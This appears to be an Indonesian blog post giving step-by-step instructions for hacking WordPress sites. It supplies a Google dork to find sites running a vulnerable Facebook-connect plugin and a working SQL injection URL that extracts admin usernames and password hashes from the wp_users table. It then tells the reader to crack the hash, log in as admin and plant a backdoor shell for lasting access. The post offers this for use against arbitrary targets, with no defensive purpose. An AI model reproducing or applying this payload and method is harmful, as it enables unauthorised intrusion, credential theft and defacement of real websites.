check this on:
Dork: inurl:"fbconnect_action=myhome"
- Buka Google, lalu masukkan dork diatas di kotak pencarian, lalu search, nah akan muncul banyak situs yang akan menjadi target
![[Image: untitled24.JPG]](https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEh2zjdWN7JDqf0_Qox81Z6FzUGSIUBUqdhy57NbJCtbp6W3XOz-_ohXAvFlsT5VWis2nbKlD40xSmBDSu2E1_BiDNGT1rUSrXcOL96Xn5_NFBd16g-do2VV4z8JvX1IkOpMekqAFoakYjFY/s400/untitled24.JPG)
- Klik situs Targetnya sob
- Sekarang ubah URL :
?fbconnect_action=myhome&userid=
- Dengan URL ini :
?fbconnect_action=myhome&fbuserid=1+and+1=2+union+select+1,2,3,4,5,concat(user_login,0x3a,user_pass)z0mbyak,7,8,9,10,11,12+from+wp_users--
- Sekarang keluar Username dan Password Admin.
passwordnya dalam bentu hash, jadi kamu perlu men-decrypt nya dulu sob, cari saja di google cara decrypt md5 hash
- Jika password telah di decrypt sekarang login menggunakan user name dan password tersebut
tambahkan /wp-admin.php dibelakang url situs target untuk login
selesai, sekarang terserah kamu mau diapakan situs tersebut, tapi lebih baik kamu menanam backdoor (shell) didalam situs tersebut untuk berjaga-jaga agar kamu selalu dapat mengakses ke situs tersebut tanpa harus login alias dari pintu belakang (backdoor), baca: Cara Menanam Shell pada Wordpress
keyword: cara deface website wordpress, cara hack wordpress, cara mudah deface wordpress, tutorial hacking, cara hack website, cara mengetahui password dan username admin wordpress
Tidak ada komentar:
Posting Komentar